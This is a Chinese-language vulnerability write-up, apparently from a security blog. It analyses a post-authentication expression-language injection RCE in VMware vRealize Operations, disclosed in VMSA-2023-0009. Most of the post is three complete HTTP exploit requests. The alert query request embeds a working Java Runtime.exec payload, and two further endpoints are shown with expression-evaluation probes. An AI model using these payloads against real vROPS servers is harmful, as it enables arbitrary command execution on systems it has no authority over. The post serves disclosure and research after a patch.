VMware vROPS RCE of java bean

Y4er 收录于类别代码审计和系列 vmware

2023-04-12 2023-12-08 约 740 字预计阅读 2 分钟

系列 - vmware

官方已经发布漏洞补丁 https://www.vmware.com/security/advisories/VMSA-2023-0009.html 公开文章

# 前言

这个漏洞是看了mr_me的文章之后 https://trenchant.io/vmware-workspace-one-access/ 顺手看了看vROPS，发现也存在这个漏洞，于是有此文，漏洞比较简单，下面简单写一下。这是一个授权后的RCE漏洞。

# 漏洞分析

com.vmware.ops.api.model.validation.AlertQueryValidator

向上回溯，该验证器的注解为AlertQueryValidate

该注解被用在com.vmware.ops.api.model.alerts.AlertQuery实体类上，找该实体类在哪用到了即可

com.vmware.ops.api.server.controller.AlertControllers.AlertQueryAndManagementController#queryAlert

1
2
3
4
public Alert.Alerts queryAlert(@BodyRequest(value = "The alertQuery criteria",required = true,examples = @Example({@ExampleProperty("StubFactory#alertQuery")})) @RequestBody @Valid AlertQuery alertQuery) {
    this.logger.info("Alert query = " + alertQuery);
    return this.alertService.queryForAlerts(alertQuery);
}

典中典写法，exp如下

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
POST /suite-api/api/alerts/query?page=1&pageSize=1000&_no_links=true HTTP/2
Host: 192.168.1.166
Content-Length: 1032
Pragma: no-cache
Cache-Control: no-cache
Sec-Ch-Ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
Dnt: 1
Sec-Ch-Ua-Mobile: ?0
Authorization: vRealizeOpsToken 762927f0-2266-4734-ada9-84fcc4b67feb::c65bf5b6-812f-45e5-bf4e-2ea405c4fca7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Content-Type: application/json
Accept: application/json
Sec-Ch-Ua-Platform: "Windows"
Origin: https://192.168.1.166
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.1.166/suite-api/doc/swagger-ui.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ga;q=0.6

{
    "compositeOperator": "AND",
    "resource-query": {
        "name": [
            "Windows2017V1M",
            "Windows2018VM"
        ],
        "regex": [
            "\\\\S+-BNA-\\\\S+",
            null
        ],
        "adapterKind": [
            "VMWARE"
        ],
        "resourceKind": [
            "HostSystem"
        ],
        "resourceId": [
            "9400ffc4-8ebb-4c43-a356-dd70b378124b"
        ],
        "statKeyInclusive": true
    },
    "alertImpact": [
        "a${''.getClass().forName('java.lang.Runtime').getMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null),'touch /tmp/asd')}"
    ],
    "activeOnly": true,
    "alertCriticality": [
        "CRITICAL",
        "IMMEDIATE",
        "WARNING",
        "INFORMATION"
    ],
    "startTimeRange": {
        "startTime": 1677826944,
        "endTime": 1677836944
    },
    "includeChildrenResources": true,
    "extractOwnerName": false
}

如此还能找到很多

com.vmware.ops.api.model.validation.ReportScheduleValidator

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
POST /suite-api/api/reportdefinitions/c5035738-f909-474e-8ae0-4c5429ff384f/schedules?_no_links=true HTTP/2
Host: 192.168.1.166
Content-Length: 477
Sec-Ch-Ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
Dnt: 1
Sec-Ch-Ua-Mobile: ?0
Authorization: vRealizeOpsToken 762927f0-2266-4734-ada9-84fcc4b67feb::65e1c585-1111-473b-884d-f022cd1b8e06
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
X-Vrealizeops-Api-Timezone: GMT
Content-Type: application/json
Accept: application/json
Sec-Ch-Ua-Platform: "Windows"
Origin: https://192.168.1.166
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.1.166/suite-api/doc/swagger-ui.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ga;q=0.6

{
  "reportDefinitionId" : "63925ab5-5dd8-4b6d-b50b-1f9e2936e91f",
  "resourceId" : [ "5715b47f-ebf6-4d58-a2f7-019fb8506a78" ],
  "traversalSpec" : {
    "name" : "Traversal spec name",
    "rootAdapterKindKey" : "VMWARE",
    "rootResourceKindKey" : "VM",
    "adapterInstanceAssociation" : false
  },
  "startDate" : "4/30/15 ${99-2}",
  "reportScheduleType" : "WEEKLY",
  "daysOfTheWeek" : [ "SUNDAY", "MONDAY" ],
  "startHour" : 1,
  "startMinute" : 0,
  "recurrence" : 2
}

com.vmware.ops.api.model.validation.RolePermissionValidator

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
PUT /suite-api/api/auth/users/5c57c63e-bc16-4f81-9309-5d7f1369bfe7/permissions?_no_links=true HTTP/2
Host: 192.168.1.166
Content-Length: 88
Sec-Ch-Ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
Dnt: 1
Sec-Ch-Ua-Mobile: ?0
Authorization: vRealizeOpsToken 762927f0-2266-4734-ada9-84fcc4b67feb::65e1c585-1111-473b-884d-f022cd1b8e06
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Content-Type: application/json
Accept: application/json
Sec-Ch-Ua-Platform: "Windows"
Origin: https://192.168.1.166
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.1.166/suite-api/doc/swagger-ui.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ga;q=0.6

{"traversal-spec-instances":[{"adapterKind":"a${99-12}"},{"adapterKind":"a${99-12}"}]}